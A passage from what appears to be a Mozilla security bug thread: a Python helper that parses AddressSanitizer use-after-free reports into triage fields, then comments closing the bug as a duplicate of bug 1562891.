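        if line.startswith("freed by thread"):
            section = "free"
            continue
        if line.startswith("previously allocated by thread"):
            section = "alloc"
            continue
        m = FRAME_RE.match(line)
        if m:
            report.stacks[section].append(Frame(int(m.group(1)), m.group(2), m.group(3)))
    if report is None:
        raise ValueError("no AddressSanitizer error header found")
    return report


def first_meaningful_frame(frames: List[Frame]) -> Optional[Frame]:
    """First frame that is not sanitizer/allocator noise."""
    for f in frames:
        if not any(p in f.location for p in NOISE_PATHS):
            return f
    return None


def short_name(function: str) -> str:
    """Strip the parameter list so names compare cleanly."""
    return function.split("(", 1)[0].strip()


def classify(report: AsanReport) -> str:
    """Assumed heuristic for the CC-freed / GC-traced pattern seen in this bug."""
    freed_by_cc = any("nsCycleCollector.cpp" in f.location for f in report.stacks["free"])
    read_by_gc = any("CycleCollectedJSRuntime.cpp" in f.location or "/js/src/gc/" in f.location
                     for f in report.stacks["access"])
    if report.bug_type == "heap-use-after-free" and freed_by_cc and read_by_gc:
        return "cycle-collected object freed, then traced as a GC root"
    return report.bug_type


def triage(text: str) -> Dict[str, Optional[str]]:
    """Condense a report into the fields a triager looks at first."""
    r = parse_asan_report(text)
    tops = {name: first_meaningful_frame(frames) for name, frames in r.stacks.items()}
    return {
        "bug_type": r.bug_type,
        "access": f"{r.access} of {r.access_size} bytes {r.offset} bytes {r.relation} a {r.region_size}-byte region",
        "access_site": short_name(tops["access"].function) if tops["access"] else None,
        "freed_in": short_name(tops["free"].function) if tops["free"] else None,
        "allocated_in": short_name(tops["alloc"].function) if tops["alloc"] else None,
        "pattern": classify(r),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_REPORT).items():
        print(f"{key:14} {value}")
```

On this bug's report the summary comes out as allocated in mozilla::dom::Blob::Stream, freed in MaybeKillObject (the cycle collector's SnowWhiteKiller), and read in JsGcTracer::Trace, which is exactly the three facts that let Baku match it to bug 1562891 below. The NOISE_PATHS skip is what makes the access site land on the Gecko tracer rather than on the inlined RootingAPI.h `operator bool` that ASAN names in its SUMMARY line.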

Attached file ASAN output

Baku, is this a dupe of that other bug?

Group: core-security → dom-core-security
Flags: needinfo?(amarchesini)

Bug 1562891, I mean.

Keywords: regression
Regressed by: 1557781

Yes. It looks like.

Status: NEW → RESOLVED
Closed: 6 years ago
Flags: needinfo?(amarchesini)
Resolution: --- → DUPLICATE
Whiteboard: [adv-main69-]
Flags: sec-bounty?
Flags: sec-bounty? → sec-bounty-
Has Regression Range: --- → yes
Group: dom-core-security